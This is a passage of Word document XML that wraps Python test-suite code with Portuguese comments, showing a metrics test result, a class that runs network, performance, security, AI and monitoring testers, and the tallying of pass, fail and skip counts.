    <w:p w14:paraId="38FFCE2D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            duration = time.time() - start_time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4895571C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243BA0F2" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            return TestResult(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9A1A3D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                test_name="real_time_metrics",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18ED6417" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                status="PASS",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6625763C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                duration=duration,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4635B842" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                details={</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EA9B5D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    "metrics_collected": len(metrics_collected),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6456FB07" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    "collection_rate": len(metrics_collected) / duration,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E916E1" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    "avg_cpu": statistics.mean([m["cpu_usage"] for m in metrics_collected]),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441F9FB0" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    "avg_memory": statistics.mean([m["memory_usage"] for m in metrics_collected])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3DF6C9" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40313A50" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                timestamp=datetime.now()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B96D8DE" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250A9344" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C070A5" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EAE34B8" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            duration = time.time() - start_time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C295B53" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            return TestResult(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A148F5" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                test_name="real_time_metrics",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B78B59F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                status="FAIL",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DC6DB3" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                duration=duration,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53695D2B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                details={"error_type": type(e).__name__},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C281F41" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                timestamp=datetime.now(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A43B1EA" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                error_message=str(e)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120D4BC8" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2320EF2E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF"/>
    <w:p w14:paraId="4184820A" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>class ComprehensiveTestSuite:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137D9AAB" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    """Suite de testes completa"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A34E36" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FC6162" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    def __init__(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4830B86E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        self.testers = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102026E9" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            NetworkCommunicationTester(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C816F0B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            PerformanceTester(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8DCDE4" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            SecurityTester(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772075F2" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            AIEvolutionTester(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3359C81D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            MonitoringTester()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165EDC7A" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503CE2ED" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        self.results = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADA7730" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1B4527" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    async def run_all_tests(self) -&gt; TestSuiteReport:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4338C568" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        """Executa todos os testes"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F9F142" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        suite_start_time = time.time()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A95FF2" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD2A134" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        logger.info("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🧪</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Iniciando suite de testes completa...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7F1D02" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5088BCC1" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        # Coletar informações do sistema</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BE0897" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        system_info = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5C3F7B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            "python_version": sys.version,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FC151E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            "platform": sys.platform,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC30C05" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            "cpu_count": psutil.cpu_count(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B0F9DA" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            "memory_total": psutil.virtual_memory().total,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786DF875" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            "disk_usage": psutil.disk_usage('/').percent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE19FA9" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B6D350" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D57163" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        # Lista de todos os testes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326BCE30" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        all_tests = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD1DE80" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            # Testes de comunicação</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A51D740" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            ("NetworkCommunicationTester", "test_message_bus_communication"),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BB8ABE" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            ("NetworkCommunicationTester", "test_agent_coordination"),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C6625A" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B813E6" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            # Testes de performance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE04C79" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            ("PerformanceTester", "test_throughput"),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE2A9B5" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            ("PerformanceTester", "test_scalability"),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B954005" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C5F3A8" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            # Testes de segurança</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602146FA" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            ("SecurityTester", "test_input_validation"),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77ACC194" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            ("SecurityTester", "test_rate_limiting"),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398B4606" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0A2661" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            # Testes de IA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336F14AE" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            ("AIEvolutionTester", "test_ai_reflection"),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47792EF4" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            ("AIEvolutionTester", "test_cache_performance"),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0B1505" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37321425" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            # Testes de monitoramento</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173B932E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            ("MonitoringTester", "test_real_time_metrics")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638A06FA" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413A98A9" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFF5E30" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        # Executar testes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CD4CA1" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        test_results = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19017343" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AFA2B6" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        for tester_name, test_method in all_tests:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58021B00" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            logger.info(f"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🔍</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Executando {test_method}...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D2A4A4" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23031906" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            # Encontrar o tester correto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E3AECE" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            tester = None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B5F471" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            for t in self.testers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6F8A90" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                if t.__class__.__name__ == tester_name:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E238549" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    tester = t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BD2C98" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B648C6C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6BF6D4" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            if tester and hasattr(tester, test_method):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E91CEC" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250777E2" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    result = await getattr(tester, test_method)()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8ECD07" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    test_results.append(result)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435C5AA9" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490EEC6C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    status_emoji = "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r>
        <w:t>" if result.status == "PASS" else "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>❌</w:t>
      </w:r>
      <w:r>
        <w:t>" if result.status == "FAIL" else "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>⏭️</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C90BBB5" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    logger.info(f"{status_emoji} {test_method}: {result.status} ({result.duration:.3f}s)")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377DEBBE" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C99B75" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755DC39F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    error_result = TestResult(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2926AF29" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                        test_name=test_method,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1A903C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                        status="FAIL",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321C2D8E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                        duration=0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0C7FAB" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                        details={"error_type": type(e).__name__},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408AB038" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                        timestamp=datetime.now(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239719CE" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                        error_message=str(e)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C5B5EB" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E10085" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    test_results.append(error_result)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DDA370" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                    logger.error(f"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>❌</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> {test_method}: ERRO - {str(e)}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD3F793" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACD8DDB" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        # Calcular estatísticas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC7E107" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        total_tests = len(test_results)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5110948C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        passed_tests = len([r for r in test_results if r.status == "PASS"])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041F91E2" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        failed_tests = len([r for r in test_results if r.status == "FAIL"])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2C4878" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        skipped_tests = len([r for r in test_results if r.status == "SKIP"])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE4F45E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
